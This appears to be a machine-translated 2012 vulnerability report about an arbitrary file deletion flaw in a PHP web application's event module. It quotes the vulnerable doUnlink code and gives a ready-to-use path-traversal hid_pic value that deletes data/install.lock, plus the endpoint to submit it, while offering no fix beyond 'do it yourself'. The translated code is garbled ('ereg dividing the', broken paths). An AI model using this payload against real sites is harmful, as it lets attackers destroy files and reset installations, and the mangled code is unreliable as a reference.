Memo Dog arbitrary file delete-bug warning-the black bar safety net

2012-08-26T00:00:00
ID MYHACK58:62201234712
Type myhack58
Reporter 佚名
Modified 2012-08-26T00:00:00

Description

Use Conditions:

  1. Only limited to windows hosts,linux is invalid, at least in my present machine.)

  2. Registered user

  3. Need to delete of the file can read and write

In modules/ajax/event. mod. php

www.xxxx.com

Protective remove the picture

function doUnlink($pic){

if(!$ pic) return false;

$type = trim(via strtolower(end(explode(".",$ pic))));

$exp = '././ images/event/[0-9]{1 0}'. MEMBER_ID.' _b.'.$ type;

if(ereg dividing the($exp,$pic)){

unlink($pic);

unlink(strtr($pic,'_b.',' _s.'));

return true;

}else {

return false;

}

}

The function in the onloadPic is called

if($_FILES['pic']['name']){

//Omitted.....................

$hid_pic = $this->Post['hid_pic'];

$eid = (int) $this->Post['id'];

$this->doUnlink($hid_pic,$eid);

//Omitted.............

}

As long as the$_FILES['pic']['name'] is not empty, then we can construct hid_pic.

hid_pic content:

././ images/event/1 2 3 4 5 6 7 8 9 0{MEMBER_ID}_b. {You want to delete the file suffix}/../../../{you want to delete the file}

For example, we want to remove./ data/install. lock file, and my MEMBER_ID is 2 then:

././ images/event/12345678902_b. lock/../../../data/install. lock

The local test is successful

Actual use:

In the index. php? mod=event&code=pevent

Upload the capture, and then in hid_pic beneath the fill././ images/event/12345678902_b. lock/../../../data/install. the lock can be

Repair solutions:

do it yourself